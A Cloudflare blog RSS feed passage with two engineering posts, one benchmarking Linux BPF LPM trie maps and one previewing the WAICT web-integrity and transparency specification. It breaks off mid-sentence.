
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Tue, 07 Apr 2026 05:03:27 GMT</lastBuildDate>
        <item>
            <title><![CDATA[A deep dive into BPF LPM trie performance and optimization]]></title>
            <link>https://blog.cloudflare.com/a-deep-dive-into-bpf-lpm-trie-performance-and-optimization/</link>
            <pubDate>Tue, 21 Oct 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ This post explores the performance of BPF LPM tries, a critical data structure used for IP matching.  ]]></description>
            <content:encoded><![CDATA[ <p>It started with a mysterious soft lockup message in production. A single, cryptic line that led us down a rabbit hole into the performance of one of the most fundamental data structures we use: the BPF LPM trie.</p><p>BPF trie maps (<a href="https://docs.ebpf.io/linux/map-type/BPF_MAP_TYPE_LPM_TRIE/">BPF_MAP_TYPE_LPM_TRIE</a>) are heavily used for things like IP and IP+Port matching when routing network packets, ensuring your request passes through the right services before returning a result. The performance of this data structure is critical for serving our customers, but the speed of the current implementation leaves a lot to be desired. We’ve run into several bottlenecks when storing millions of entries in BPF LPM trie maps, such as entry lookup times taking hundreds of milliseconds to complete and freeing maps locking up a CPU for over 10 seconds. For instance, BPF maps are used when evaluating Cloudflare’s <a href="https://www.cloudflare.com/network-services/products/magic-firewall/"><u>Magic Firewall</u></a> rules and these bottlenecks have even led to traffic packet loss for some customers.</p><p>This post gives a refresher of how tries and prefix matching work, benchmark results, and a list of the shortcomings of the current BPF LPM trie implementation.</p>
    <div>
      <h2>A brief recap of tries</h2>
      <a href="#a-brief-recap-of-tries">
        
      </a>
    </div>
    <p>If it’s been a while since you last looked at the trie data structure (or if you’ve never seen it before), a trie is a tree data structure (similar to a binary tree) that allows you to store and search for data for a given key and where each node stores some number of key bits.</p><p>Searches are performed by traversing a path, which essentially reconstructs the key from the traversal path, meaning nodes do not need to store their full key. This differs from a traditional binary search tree (BST) where the primary invariant is that the left child node has a key that is less than the current node and the right child has a key that is greater. BSTs require that each node store the full key so that a comparison can be made at each search step.</p><p>Here’s an example that shows how a BST might store values for the keys:</p><ul><li><p>ABC</p></li><li><p>ABCD</p></li><li><p>ABCDEFGH</p></li><li><p>DEF</p></li></ul>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1uXt5qwpyq7VzrqxXlHFLj/99677afd73a98b9ce04d30209065499f/image4.png" />
          </figure><p>In comparison, a trie for storing the same set of keys might look like this.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3TfFZmwekNAF18yWlOIVWh/58396a19e053bd1c02734a6a54eea18e/image8.png" />
          </figure><p>This way of splitting out bits is really memory-efficient when you have redundancy in your data, e.g. prefixes are common in your keys, because that shared data only requires a single set of nodes. It’s for this reason that tries are often used to efficiently store strings, e.g. dictionaries of words – storing the strings “ABC” and “ABCD” doesn’t require 3 bytes + 4 bytes (assuming ASCII), it only requires 3 bytes + 1 byte because “ABC” is shared by both (the exact number of bits required in the trie is implementation dependent).</p><p>Tries also allow more efficient searching. For instance, if you wanted to know whether the key “CAR” existed in the BST you are required to go to the right child of the root (the node with key “DEF”) and check its left child because this is where it would live if it existed. A trie is more efficient because it searches in prefix order. In this particular example, a trie knows at the root whether that key is in the trie or not.</p><p>This design makes tries perfectly suited for performing longest prefix matches and for working with IP routing using CIDR. CIDR was introduced to make more efficient use of the IP address space (no longer requiring that classes fall into 4 buckets of 8 bits) but comes with added complexity because now the network portion of an IP address can fall anywhere. Handling the CIDR scheme in IP routing tables requires matching on the longest (most specific) prefix in the table rather than performing a search for an exact match.</p><p>If searching a trie does a single-bit comparison at each node, that’s a binary trie. If searching compares more bits we call that a <b><i>multibit trie</i></b>. You can store anything you like in a trie, including IP and subnet addresses – it’s all just ones and zeroes.</p><p>Nodes in multibit tries use more memory than in binary tries, but since computers operate on multibit words anyhow, it’s more efficient from a microarchitecture perspective to use multibit tries because you can traverse through the bits faster, reducing the number of comparisons you need to make to search for your data. It’s a classic space vs time tradeoff.</p><p>There are other optimisations we can use with tries. The distribution of data that you store in a trie might not be uniform and there could be sparsely populated areas. For example, if you store the strings “A” and “BCDEFGHI” in a multibit trie, how many nodes do you expect to use? If you’re using ASCII, you could construct the binary trie with a root node and branch left for “A” or right for “B”. With 8-bit nodes, you’d need another 7 nodes to store “C”, “D”, “E”, “F”, “G”, “H", “I”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/LO6izFC5e06dRf9ra2roC/167ba5c4128fcebacc7b7a8eab199ea5/image5.png" />
          </figure><p>Since there are no other strings in the trie, that’s pretty suboptimal. Once you hit the first level after matching on “B” you know there’s only one string in the trie with that prefix, and you can avoid creating all the other nodes by using <b><i>path compression</i></b>. Path compression replaces nodes “C”, “D”, “E” etc. with a single one such as “I”.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ADY3lNtF7NIgfUX7bX9vY/828a14e155d6530a4dc8cf3286ce8cc3/image13.png" />
          </figure><p>If you traverse the tree and hit “I”, you still need to compare the search key with the bits you skipped (“CDEFGH”) to make sure your search key matches the string. Exactly how and where you store the skipped bits is implementation dependent – BPF LPM tries simply store the entire key in the leaf node. As your data becomes denser, path compression is less effective.</p><p>What if your data distribution is dense and, say, all the first 3 levels in a trie are fully populated? In that case you can use <b><i>level compression</i></b><i> </i>and replace all the nodes in those levels with a single node that has 2**3 children. This is how Level-Compressed Tries work which are used for <a href="https://vincent.bernat.ch/en/blog/2017-ipv4-route-lookup-linux">IP route lookup</a> in the Linux kernel (see <a href="https://elixir.bootlin.com/linux/v6.12.43/source/net/ipv4/fib_trie.c"><u>net/ipv4/fib_trie.c</u></a>).</p><p>There are other optimisations too, but this brief detour is sufficient for this post because the BPF LPM trie implementation in the kernel doesn’t fully use the three we just discussed.</p>
    <div>
      <h2>How fast are BPF LPM trie maps?</h2>
      <a href="#how-fast-are-bpf-lpm-trie-maps">
        
      </a>
    </div>
    <p>Here are some numbers from running <a href="https://lore.kernel.org/bpf/20250827140149.1001557-1-matt@readmodwrite.com/"><u>BPF selftests benchmark</u></a> on AMD EPYC 9684X 96-Core machines. Here the trie has 10K entries, a 32-bit prefix length, and an entry for every key in the range [0, 10K).</p><table><tr><td><p>Operation</p></td><td><p>Throughput</p></td><td><p>Stddev</p></td><td><p>Latency</p></td></tr><tr><td><p>lookup</p></td><td><p>7.423M ops/s</p></td><td><p>0.023M ops/s</p></td><td><p>134.710 ns/op</p></td></tr><tr><td><p>update</p></td><td><p>2.643M ops/s</p></td><td><p>0.015M ops/s</p></td><td><p>378.310 ns/op</p></td></tr><tr><td><p>delete</p></td><td><p>0.712M ops/s</p></td><td><p>0.008M ops/s</p></td><td><p>1405.152 ns/op</p></td></tr><tr><td><p>free</p></td><td><p>0.573K ops/s</p></td><td><p>0.574K ops/s</p></td><td><p>1.743 ms/op</p></td></tr></table><p>The time to free a BPF LPM trie with 10K entries is noticeably large. We recently ran into an issue where this took so long that it caused <a href="https://lore.kernel.org/lkml/20250616095532.47020-1-matt@readmodwrite.com/"><u>soft lockup messages</u></a> to spew in production.</p><p>This benchmark gives some idea of worst case behaviour. Since the keys are so densely populated, path compression is completely ineffective. In the next section, we explore the lookup operation to understand the bottlenecks involved.</p>
    <div>
      <h2>Why are BPF LPM tries slow?</h2>
      <a href="#why-are-bpf-lpm-tries-slow">
        
      </a>
    </div>
    <p>The LPM trie implementation in <a href="https://elixir.bootlin.com/linux/v6.12.43/source/kernel/bpf/lpm_trie.c"><u>kernel/bpf/lpm_trie.c</u></a> has a couple of the optimisations we discussed in the introduction. It is capable of multibit comparisons at leaf nodes, but since there are only two child pointers in each internal node, if your tree is densely populated with a lot of data that only differs by one bit, these multibit comparisons degrade into single bit comparisons.</p><p>Here’s an example. Suppose you store the numbers 0, 1, and 3 in a BPF LPM trie. You might hope that since these values fit in a single 32 or 64-bit machine word, you could use a single comparison to decide which next node to visit in the trie. But that’s only possible if your trie implementation has 3 child pointers in the current node (which, to be fair, most trie implementations do). In other words, you want to make a 3-way branching decision but since BPF LPM tries only have two children, you’re limited to a 2-way branch.</p><p>A diagram for this 2-child trie is given below.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ciL2t6aMyJHR2FfX41rNk/365abe47cf384729408cf9b98c65c0be/image9.png" />
          </figure><p>The leaf nodes are shown in green with the key, as a binary string, in the center. Even though a single 8-bit comparison is more than capable of figuring out which node has that key, the BPF LPM trie implementation resorts to inserting intermediate nodes (blue) to inject 2-way branching decisions into your path traversal because its parent (the orange root node in this case) only has 2 children. Once you reach a leaf node, BPF LPM tries can perform a multibit comparison to check the key. If a node supported pointers to more children, the above trie could instead look like this, allowing a 3-way branch and reducing the lookup time.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/17VoWl8OY6tzcARKDKuSjS/b9200dbeddf13f101b7085a549742f95/image3.png" />
          </figure><p>This 2-child design impacts the height of the trie. In the worst case, a completely full trie essentially becomes a binary search tree with height log2(nr_entries) and the height of the trie impacts how many comparisons are required to search for a key.</p><p>The above trie also shows how BPF LPM tries implement a form of path compression – you only need to insert an intermediate node where you have two nodes whose keys differ by a single bit. If instead of 3, you insert a key of 15 (0b1111), this won’t change the layout of the trie; you still only need a single node at the right child of the root.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2ecfKSeoqN3bfBXmC9KHw5/3be952edea34d6b2cc867ba31ce14805/image12.png" />
          </figure><p>And finally, BPF LPM tries do not implement level compression. Again, this stems from the fact that nodes in the trie can only have 2 children. IP route tables tend to have many prefixes in common and you typically see densely packed tries at the upper levels which makes level compression very effective for tries containing IP routes.</p><p>Here’s a graph showing how the lookup throughput for LPM tries (measured in million ops/sec) degrades as the number of entries increases, from 1 entry up to 100K entries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33I92exrEZTcUWOjxaBOqY/fb1de551b06e3272c8670d0117d738fa/image2.png" />
          </figure><p>Once you reach 1 million entries, throughput is around 1.5 million ops/sec, and continues to fall as the number of entries increases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4OhaAaI5Y2XJCofI9V39z/567a01b3335f29ef3b46ccdd74dc27e5/image1.png" />
          </figure><p>Why is this? Initially, this is because of the L1 dcache miss rate. All of those nodes that need to be traversed in the trie are potential cache miss opportunities.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Gx4fOLKmhUKHegybQU7sl/4936239213f0061d5cbc2f5d6b63fde6/image11.png" />
          </figure><p>As you can see from the graph, L1 dcache miss rate remains relatively steady and yet the throughput continues to decline. At around 80K entries, dTLB miss rate becomes the bottleneck.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Jy7aTN3Nyo2EsbSzw313n/d26871fa417ffe293adb47fe7f7dc56b/image7.png" />
          </figure><p>Because BPF LPM tries to dynamically allocate individual nodes from a freelist of kernel memory, these nodes can live at arbitrary addresses. Which means traversing a path through a trie almost certainly will incur cache misses and potentially dTLB misses. This gets worse as the number of entries, and height of the trie, increases.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6CB3MvSvSgH1T2eY7Xlei8/81ebe572592ca71529d79564a88993f0/image10.png" />
          </figure>
    <div>
      <h2>Where do we go from here?</h2>
      <a href="#where-do-we-go-from-here">
        
      </a>
    </div>
    <p>By understanding the current limitations of the BPF LPM trie, we can now work towards building a more performant and efficient solution for the future of the Internet.</p><p>We’ve already contributed these benchmarks to the upstream Linux kernel — but that’s only the start. We have plans to improve the performance of BPM LPM tries, particularly the lookup function which is heavily used for our workloads. This post covered a number of optimisations that are already used by the <a href="https://elixir.bootlin.com/linux/v6.12.43/source/net/ipv4/fib_trie.c"><u>net/ipv4/fib_trie.c</u></a> code, so a natural first step is to refactor that code so that a common Level Compressed trie implementation can be used. Expect future blog posts to explore this work in depth.</p><p>If you’re interested in looking at more performance numbers, <a href="https://wiki.cfdata.org/display/~jesper">Jesper Brouer</a> has recorded some here: <a href="https://github.com/xdp-project/xdp-project/blob/main/areas/bench/bench02_lpm-trie-lookup.org">https://github.com/xdp-project/xdp-project/blob/main/areas/bench/bench02_lpm-trie-lookup.org</a>.</p><h6><i>If the Linux kernel, performance, or optimising data structures excites you, </i><a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering&amp;location=default"><i>our engineering teams are hiring</i></a><i>.</i></h6><p></p> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[eBPF]]></category>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Performance]]></category>
            <guid isPermaLink="false">2A4WHjTqyxprwUMPaZ6tfj</guid>
            <dc:creator>Matt Fleming</dc:creator>
            <dc:creator>Jesper Brouer</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improving the trustworthiness of Javascript on the Web]]></title>
            <link>https://blog.cloudflare.com/improving-the-trustworthiness-of-javascript-on-the-web/</link>
            <pubDate>Thu, 16 Oct 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ There's no way to audit a site’s client-side code as it changes, making it hard to trust sites that use cryptography. We preview a specification we co-authored that adds auditability to the web. ]]></description>
            <content:encoded><![CDATA[ <p>The web is the most powerful application platform in existence. As long as you have the <a href="https://developer.mozilla.org/en-US/docs/Web/API"><u>right API</u></a>, you can safely run anything you want in a browser.</p><p>Well… anything but cryptography.</p><p>It is as true today as it was in 2011 that <a href="https://web.archive.org/web/20200731144044/https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2011/august/javascript-cryptography-considered-harmful/"><u>Javascript cryptography is Considered Harmful</u></a>. The main problem is code distribution. Consider an end-to-end-encrypted messaging web application. The application generates <a href="https://www.cloudflare.com/learning/ssl/what-is-a-cryptographic-key/"><u>cryptographic keys</u></a> in the client’s browser that lets users view and send <a href="https://en.wikipedia.org/wiki/End-to-end_encryption"><u>end-to-end encrypted</u></a> messages to each other. If the application is compromised, what would stop the malicious actor from simply modifying their Javascript to exfiltrate messages?</p><p>It is interesting to note that smartphone apps don’t have this issue. This is because app stores do a lot of heavy lifting to provide security for the app ecosystem. Specifically, they provide <b>integrity</b>, ensuring that apps being delivered are not tampered with, <b>consistency</b>, ensuring all users get the same app, and <b>transparency</b>, ensuring that the record of versions of an app is truthful and publicly visible.</p><p>It would be nice if we could get these properties for our end-to-end encrypted web application, and the web as a whole, without requiring a single central authority like an app store. Further, such a system would benefit all in-browser uses of cryptography, not just end-to-end-encrypted apps. For example, many web-based confidential <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/"><u>LLMs</u></a>, cryptocurrency wallets, and voting systems use in-browser Javascript cryptography for the last step of their verification chains.</p><p>In this post, we will provide an early look at such a system, called <a href="https://github.com/beurdouche/explainers/blob/main/waict-explainer.md"><u>Web Application Integrity, Consistency, and Transparency</u></a> (WAICT) that we have helped author. WAICT is a <a href="https://www.w3.org/"><u>W3C</u></a>-backed effort among browser vendors, cloud providers, and encrypted communication developers to bring stronger security guarantees to the entire web. We will discuss the problem we need to solve, and build up to a solution resembling the <a href="https://github.com/rozbb/draft-waict-transparency"><u>current transparency specification draft</u></a>. We hope to build even wider consensus on the solution design in the near future.</p>
    <div>
      <h2>Defining the Web Application</h2>
      <a href="#defining-the-web-application">
        
      </a>
    </div>
    <p>In order to talk about security guarantees of a web application, it is first necessary to define precisely what the application <i>is</i>. A smartphone application is essentially just a zip file. But a website is made up of interlinked assets, including HTML, Javascript, WASM, and CSS, that can each be locally or externally hosted. Further, if any asset changes, it could drastically change the functioning of the application. A coherent definition of an application thus requires the application to commit to precisely the assets it loads. This is done using integrity features, which we describe now.</p>
    <div>
      <h3>Subresource Integrity</h3>
      <a href="#subresource-integrity">
        
      </a>
    </div>
    <p>An important building block for defining a single coherent application is <b>subresource integrity</b> (SRI). SRI is a feature built into most browsers that permits a website to specify the cryptographic hash of external resources, e.g.,</p>
            <pre><code>&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.13.7/underscore-min.js" integrity="sha512-dvWGkLATSdw5qWb2qozZBRKJ80Omy2YN/aF3wTUVC5+D1eqbA+TjWpPpoj8vorK5xGLMa2ZqIeWCpDZP/+pQGQ=="&gt;&lt;/script&gt;</code></pre>
            <p>This causes the browser to fetch <code>underscore.js</code> from <code>cdnjs.cloudflare.com</code> and verify that its SHA-512 hash matches the given hash in the tag. If they match, the script is loaded. If not, an error is thrown and nothing is executed.</p><p>If every external script, stylesheet, etc. on a page comes with an SRI integrity attribute, then the whole page is defined by just its HTML. This is close to what we want, but a web application can consist of many pages, and there is no way for a page to enforce the hash of the pages it links to.</p>
    <div>
      <h3>Integrity Manifest</h3>
      <a href="#integrity-manifest">
        
      </a>
    </div>
    <p>We would like to have a way of enforcing integrity on an entire site, i.e., every asset under a domain. For this, WAICT defines an <b>integrity manifest</b>, a configuration file that websites can provide to clients. One important item in the manifest is the <b>asset hashes dictionary</b>, mapping a hash belonging to an asset that the browser might load from that domain, to the path of that asset. Assets that may occur at any path, e.g., an error page, map to the empty string:</p>
            <pre><code>"hashes": {
"81db308d0df59b74d4a9bd25c546f25ec0fdb15a8d6d530c07a89344ae8eeb02": "/assets/js/main.js",
"fbd1d07879e672fd4557a2fa1bb2e435d88eac072f8903020a18672d5eddfb7c": "/index.html",
"5e737a67c38189a01f73040b06b4a0393b7ea71c86cf73744914bbb0cf0062eb": "/vendored/main.css",
"684ad58287ff2d085927cb1544c7d685ace897b6b25d33e46d2ec46a355b1f0e": "",
"f802517f1b2406e308599ca6f4c02d2ae28bb53ff2a5dbcddb538391cb6ad56a": ""
}
</code></pre>
            <p>The other main component of the manifest is the <b>integrity policy</b>, which tells the browser which data types are being enforced and how strictly. For example, the policy in the manifest below will:</p><ol><li><p>Reject any script before running it, if it’s missing an SRI tag and doesn’t appear in the hashes</p></li><li><p>Reject any WASM possibly after running it, if it’s missing an SRI tag and doesn’t appear in hashes</p></li></ol>
            <pre><code>"integrity-policy": "blocked-destinations=(script), checked-destinations=(wasm)"</code></pre>
            <p>Put together, these make up the integrity manifest:</p>
            <pre><code>"manifest": {
  "version": 1,
  "integrity-policy": ...,
  "hashes": ...,
}
</code></pre>
            <p>Thus, when both SRI and integrity manifests are used, the entire site and its interpretation by the browser is uniquely determined by the hash of the integrity manifest. This is exactly what we wanted. We have distilled the problem of endowing authenticity, consistent distribution, etc. to a web application to one of endowing the same properties to a single hash.</p>
    <div>
      <h2>Achieving Transparency</h2>
      <a href="#achieving-transparency">
        
      </a>
    </div>
    <p>Recall, a transparent web application is one whose code is stored in a publicly accessible, append-only log. This is helpful in two ways: 1) if a user is served malicious code and they learn about it, there is a public record of the code they ran, and so they can prove it to external parties, and 2) if a user is served malicious code and they don’t learn about it, there is still a chance that an external auditor may comb through the historical web application code and find the malicious code anyway. Of course, transparency does not help detect malicious code or even prevent its distribution, but it at least makes it <i>publicly auditable</i>.</p><p>Now that we have a single hash that commits to an entire website’s contents, we can talk about ensuring that that hash ends up in a public log. We have several important requirements here:</p><ol><li><p><b>Do not break existing sites.</b> This one is a given. Whatever system gets deployed, it should not interfere with the correct functioning of existing websites. Participation in transparency should be strictly opt-in.</p></li><li><p><b>No added round trips.</b> Transparency should not cause extra network round trips between the client and the server. Otherwise there will be a network latency penalty for users who want transparency.</p></li><li><p><b>User privacy.</b> A user should not have to identify themselves to any party more than they already do. That means no connections to new third parties, and no sending identifying information to the website.</p></li><li><p><b>User statelessness.</b> A user should not have to store site-specific data. We do not want solutions that rely on storing or gossipping per-site cryptographic information.</p></li><li><p><b>Non-centralization.</b> There should not be a single point of failure in the system—if any single party experiences downtime, the system should still be able to make progress. Similarly, there should be no single point of trust—if a user distrusts any single party, the user should still receive all the security benefits of the system.</p></li><li><p><b>Ease of opt-in.</b> The barrier of entry for transparency should be as low as possible. A site operator should be able to start logging their site cheaply and without being an expert.</p></li><li><p><b>Ease of opt-out.</b> It should be easy for a website to stop participating in transparency. Further, to avoid accidental lock-in like the <a href="https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning#Criticism_and_decline"><u>defunct HPKP spec</u></a>, it should be possible for this to happen even if all cryptographic material is lost, e.g., in the seizure or selling of a domain.</p></li><li><p><b>Opt-out is transparent.</b> As described before, because transparency is optional, it is possible for an attacker to disable the site’s transparency, serve malicious content, then enable transparency again. We must make sure this kind of attack is detectable, i.e., the act of disabling transparency must itself be logged somewhere.</p></li><li><p><b>Monitorability.</b> A website operator should be able to efficiently monitor the transparency information being published about their website. In particular, they should not have to run a high-network-load, always-on program just to notify them if their site has been hijacked.</p></li></ol><p>With these requirements in place, we can move on to construction. We introduce a data structure that will be essential to the design.</p>
    <div>
      <h3>Hash Chain</h3>
      <a href="#hash-chain">
        
      </a>
    </div>
    <p>Almost everything in transparency is an append-only log, i.e., a data structure that acts like a list and has the ability to produce an <b>inclusion proof</b>, i.e., a proof that an element occurs at a particular index in the list; and a <b>consistency proof</b>, i.e., a proof that a list is an extension of a previous version of the list. A consistency proof between two lists demonstrates that no elements were modified or deleted, only added.</p><p>The simplest possible append-only log is a <b>hash chain</b>, a list-like data structure wherein each subsequent element is hashed into the running <i>chain hash</i>. The final chain hash is a succinct representation of the entire list.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nVcIeoKTYEd0hydT9jdpj/fd90a78cba46c1893058a7ff40a42fac/BLOG-2875_2.png" />
          </figure><p><sub>A hash chain. The green nodes represent the </sub><sub><i>chain hash</i></sub><sub>, i.e., the hash of the element below it, concatenated with the previous chain hash. </sub></p><p>The proof structures are quite simple. To prove inclusion of the element at index i, the prover provides the chain hash before <code>i</code>, and all the elements after <code>i</code>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7tYbCRVVTV3osE3lWs8YjG/be76d6022420ffa3d78b0180ef69bb1a/BLOG-2875_3.png" />
          </figure><p><sub>Proof of inclusion for the second element in the hash chain. The verifier knows only the final chain hash. It checks equality of the final computed chain hash with the known final chain hash. The light green nodes represent hashes that the verifier computes. </sub></p><p>Similarly, to prove consistency between the chains of size i and j, the prover provides the elements between i and j:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rR4DMJIVxNxePI6DARtFD/e9da2930043864a4add3a74b699535d6/BLOG-2875_4.png" />
          </figure><p><sub>Proof of consistency of the chain of size one and chain of size three. The verifier has the chain hashes from the starting and ending chains. It checks equality of the final computed chain hash with the known ending chain hash. The light green nodes represent hashes that the verifier computes. </sub></p>
    <div>
      <h3>Building Transparency</h3>
      <a href="#building-transparency">
        
      </a>
    </div>
    <p>We can use hash chains to build a transparency scheme for websites.</p>
    <div>
      <h4>Per-Site Logs</h4>
      <a href="#per-site-logs">
        
      </a>
    </div>
    <p>As a first step, let’s give every site its own log, instantiated as a hash chain (we will discuss how these all come together into one big log later). The items of the log are just the manifest of the site at a particular point in time:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/35o9mKoVPkOExKRFHRgWTu/305d589e0a584a3200670aab5b060c2b/BLOG-2875_5.png" />
          </figure><p><sub>A site’s hash chain-based log, containing three historical manifests. </sub></p><p>In reality, the log does not store the manifest itself, but the manifest hash. Sites designate an <b>asset host</b> that knows how to map hashes to the data they reference. This is a content-addressable storage backend, and can be implemented using strongly cached static hosting solutions.</p><p>A log on its own is not very trustworthy. Whoever runs the log can add and remove elements at will and then recompute the hash chain. To maintain the append-only-ness of the chain, we designate a trusted third party, called a <b>witness</b>. Given a hash chain consistency proof and a new chain hash, a witness:</p><ol><li><p>Verifies the consistency proof with respect to its old stored chain hash, and the new provided chain hash.</p></li><li><p>If successful, signs the new chain hash along with a signature timestamp.</p></li></ol><p>Now, when a user navigates to a website with transparency enabled, the sequence of events is:</p><ol><li><p>The site serves its manifest, an inclusion proof showing that the manifest appears in the log, and all the signatures from all the witnesses who have validated the log chain hash.</p></li><li><p>The browser verifies the signatures from whichever witnesses it trusts.</p></li><li><p>The browser verifies the inclusion proof. The manifest must be the newest entry in the chain (we discuss how to serve old manifests later).</p></li><li><p>The browser proceeds with the usual manifest and SRI integrity checks.</p></li></ol><p>At this point, the user knows that the given manifest has been recorded in a log whose chain hash has been saved by a trustworthy witness, so they can be reasonably sure that the manifest won’t be removed from history. Further, assuming the asset host functions correctly, the user knows that a copy of all the received code is readily available.</p><p><b>The need to signal transparency.</b> The above algorithm works, but we have a problem: if an attacker takes control of a site, they can simply stop serving transparency information and thus implicitly disable transparency without detection. So we need an explicit mechanism that keeps track of every website that has enrolled into transparency.</p>
    <div>
      <h3>The Transparency Service</h3>
      <a href="#the-transparency-service">
        
      </a>
    </div>
    <p>To store all the sites enrolled into transparency, we want a global data structure that maps a site domain to the site log’s chain hash. One efficient way of representing this is a <b>prefix tree</b> (a.k.a., a <i>trie</i>). Every leaf in the tree corresponds to a site’s domain, and its value is the chain hash of that site’s log, the current log size, and the site’s asset host URL. For a site to prove validity of its transparency data, it will have to present an inclusion proof for its leaf. Fortunately, these proofs are efficient for prefix trees.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/26ieMXRdvWIhLKv6J6Cdd7/29814a4a51c8ca8e3279e9b5756d0c67/BLOG-2875_6.png" />
          </figure><p><sub>A prefix tree with four elements. Each leaf’s path corresponds to a domain. Each leaf’s value is the chain hash of its site’s log. </sub></p><p>To add itself to the tree, a site proves possession of its domain to the <b>transparency service</b>, i.e., the party that operates the prefix tree, and provides an asset host URL. To update the entry, the site sends the new entry to the transparency service, which will compute the new chain hash. And to unenroll from transparency, the site just requests to have its entry removed from the tree (an adversary can do this too; we discuss how to detect this below).</p>
    <div>
      <h4>Proving to Witnesses and Browsers</h4>
      <a href="#proving-to-witnesses-and-browsers">
        
      </a>
    </div>
    <p>Now witnesses only need to look at the prefix tree instead of individual site logs, and thus they must verify whole-tree updates. The most important thing to ensure is that every site’s log is append-only. So whenever the tree is updated, it must produce a “proof” containing every new/deleted/modified entry, as well as a consistency proof for each entry showing that the site log corresponding to that entry has been properly appended to. Once the witness has verified this prefix tree update proof, it signs the root.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2bq4UBxoOgKPcysPPxnKD8/9e8c2a8a3b092fffae853b8d477efb07/BLOG-2875_7.png" />
          </figure><p><sub>The sequence of updating a site’s assets and serving the site with transparency enabled.</sub></p><p>The client-side verification procedure is as in the previous section, with two modifications:</p><ol><li><p>The client now verifies two inclusion proofs: one for the integrity policy’s membership in the site log, and one for the site log’s membership in a prefix tree.</p></li><li><p>The client verifies the signature over the prefix tree root, since the witness no longer signs individual chain hashes. As before, the acceptable public keys are whichever witnesses the client trusts.</p></li></ol><p><b>Signaling transparency.</b> Now that there is a single source of truth, namely the prefix tree, a client can know a site is enrolled in transparency by simply fetching the site’s entry in the tree. This alone would work, but it violates our requirement of “no added round trips,” so we instead require that client browsers will ship with the list of sites included in the prefix tree. We call this the <b>transparency preload list</b>. </p><p>If a site appears in the preload list, the browser will expect it to provide an inclusion proof in the prefix tree, or else a proof of non-inclusion in a newer version of the prefix tree, thereby showing they’ve unenrolled. The site must provide one of these proofs until the last preload list it appears in has expired. Finally, even though the preload list is derived from the prefix tree, there is nothing enforcing this relationship. Thus, the preload list should also be published transparently.</p>
    <div>
      <h4>Filling in Missing Properties</h4>
      <a href="#filling-in-missing-properties">
        
      </a>
    </div>
    <p>Remember we still have the requirements of monitorability, opt-out being transparent, and no single point of failure/trust. We fill in those details now.</p><p><b>Adding monitorability.</b> So far, in order for a site operator to ensure their site was not hijacked, they would have to constantly query every transparency service for its domain and verify that it hasn’t been tampered with. This is certainly better than the <a href="https://ct.cloudflare.com/"><u>500k events per hour</u></a> that CT monitors have to ingest, but it still requires the monitor to be constantly polling the prefix tree, and it imposes a constant load for the transparency service.</p><p>We add a field to the prefix tree leaf structure: the leaf now stores a “created” timestamp, containing the time the leaf was created. Witnesses ensure that the “created” field remains the same over all leaf updates (and it is deleted when the leaf is deleted). To monitor, a site operator need only keep the last observed “created” and “log size” fields of its leaf. If it fetches the latest leaf and sees both unchanged, it knows that no changes occurred since the last check.</p><p><b>Adding transparency of opt-out.</b> We must also do the same thing as above for leaf deletions. When a leaf is deleted, a monitor should be able to learn when the deletion occurred within some reasonable time frame. Thus, rather than outright removing a leaf, the transparency service responds to unenrollment requests by replacing the leaf with a <b>tombstone</b> value, containing just a “created” timestamp. As before, witnesses ensure that this field remains unchanged until the leaf is permanently deleted (after some visibility period) or re-enrolled.</p><p><b>Permitting multiple transparency services.</b> Since we require that there be no single point of failure or trust, we imagine an ecosystem where there are a handful of non-colluding, reasonably trustworthy transparency service providers, each with their own prefix tree. Like Certificate Transparency (CT), this set should not be too large. It must be small enough that reasonable levels of trust can be established, and so that independent auditors can reasonably handle the load of verifying all of them.</p><p>Ok that’s the end of the most technical part of this post. We’re now going to talk about how to tweak this system to provide all kinds 